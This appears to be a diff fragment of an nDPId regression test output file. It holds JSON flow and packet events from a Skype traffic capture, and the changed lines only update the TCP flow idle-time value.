00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/bcAAEARMcnAqAEi1cezmjLdnFEALEFuevMCLFThLGMqgdMtKoErvKHNoLTdO9PKUomxAAk6+9gobSzp"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABADJRAAEAG447AqAEinTfrk8gmAbvxz5x7AAAAALAC\/\/+ORwAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+dJAAEAGXrbAqAEiQTffLcgnAbvOrmZyAAAAALAC\/\/9P1wAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABAiTBAAEAGNbPAqAEib91KLcgoAbtIes+yAAAAALAC\/\/\/TJAAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1431970651444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651444,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIgG7yCZm7uws8c+cfKASOJB\/agAAAgQFrAQCCApMYEfJPjHHwQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1431970651444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651444,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0trlAAEAGOXXAqAEinTfrk8gmAbvxz5x8Zu7sLYAQECzWVQAAAQEICj4xyABMYEfJ"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1431970651510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651510,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIgG7yCcCmRcOzq5mc6ASOJDW4gAAAgQFrAQCCApNlOogPjHHwQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1431970651510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651510,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03TJAAEAGe2LAqAEiQTffLcgnAbvOrmZzApkXD4AQECwtjQAAAQEICj4xyEFNlOog"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1431970651677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651677,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIgG7yCgNTasLSHrPs6ASOJD34AAAAgQFrAQCCApNh63LPjHHwQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABADJRAAEAG447AqAEinTfrk8gmAbvxz5x7AAAAALAC\/\/+ORwAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+dJAAEAGXrbAqAEiQTffLcgnAbvOrmZyAAAAALAC\/\/9P1wAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABAiTBAAEAGNbPAqAEib91KLcgoAbtIes+yAAAAALAC\/\/\/TJAAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1431970651444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651444,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIgG7yCZm7uws8c+cfKASOJB\/agAAAgQFrAQCCApMYEfJPjHHwQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1431970651444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651444,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0trlAAEAGOXXAqAEinTfrk8gmAbvxz5x8Zu7sLYAQECzWVQAAAQEICj4xyABMYEfJ"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1431970651510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651510,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIgG7yCcCmRcOzq5mc6ASOJDW4gAAAgQFrAQCCApNlOogPjHHwQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1431970651510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651510,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03TJAAEAGe2LAqAEiQTffLcgnAbvOrmZzApkXD4AQECwtjQAAAQEICj4xyEFNlOog"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1431970651677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651677,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIgG7yCgNTasLSHrPs6ASOJD34AAAAgQFrAQCCApNh63LPjHHwQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fnAAAEARsRvAqAEi1cezkjLdgQkAKdgxevUC7H9CpX1vDFjUgifamALKVmn9IG\/Fgz6DNfXKD8OP"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -299,10 +299,10 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DD0AAEARIzfAqAEi1cezrjLdnFkAJTHjev0CDsFSgVTjU3l7SB\/6pLcIO\/MFhUO5HKYdIt4="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyWSMAAEARpePAqAEib91KDTLdnEkAHvqKev8C0IwzOBgB3UEKOkJTX5CI9Vwhwg=="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -348,8 +348,8 @@ 